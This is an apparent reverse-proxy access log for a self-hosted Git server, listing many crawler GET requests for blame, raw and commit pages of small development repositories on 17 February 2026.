"/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" +[17/Feb/2026:14:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" +[17/Feb/2026:14:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" +[17/Feb/2026:14:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11404] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" +[17/Feb/2026:14:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" [Client 74.7.227.38] [Length 11698] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:14:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" [Client 74.7.227.38] [Length 11093] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:14:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 48025] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:14:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fproject.nuget.cache" [Client 74.7.227.38] [Length 22754] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:14:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15266] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" +[17/Feb/2026:14:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15232] [Gzip 8.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" +[17/Feb/2026:14:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" +[17/Feb/2026:14:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" +[17/Feb/2026:14:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" +[17/Feb/2026:14:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" +[17/Feb/2026:14:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" +[17/Feb/2026:14:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" +[17/Feb/2026:14:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" +[17/Feb/2026:14:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" [Client 74.7.227.38] [Length 10118] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" +[17/Feb/2026:14:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" [Client 74.7.227.38] [Length 10386] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" +[17/Feb/2026:14:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" +[17/Feb/2026:14:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10466] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" +[17/Feb/2026:14:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" +[17/Feb/2026:14:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" +[17/Feb/2026:14:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2ftypes.ts" [Client 74.7.227.38] [Length 23310] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" +[17/Feb/2026:14:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2findex.tsx" [Client 74.7.227.38] [Length 23410] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" +[17/Feb/2026:14:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 74.7.227.38] [Length 10071] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:14:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 74.7.227.38] [Length 10395] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" +[17/Feb/2026:14:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fproject.assets.json" [Client 74.7.227.38] [Length 20725] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:14:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10937] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14825] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14855] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 10893] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:14:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10937] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" +[17/Feb/2026:14:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10776] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" +[17/Feb/2026:14:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9900] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24000] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23965] [Gzip 15.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16187] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" +[17/Feb/2026:14:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10937] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" +[17/Feb/2026:14:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:14:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/TestApp" +[17/Feb/2026:14:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11827] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29813] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11195] 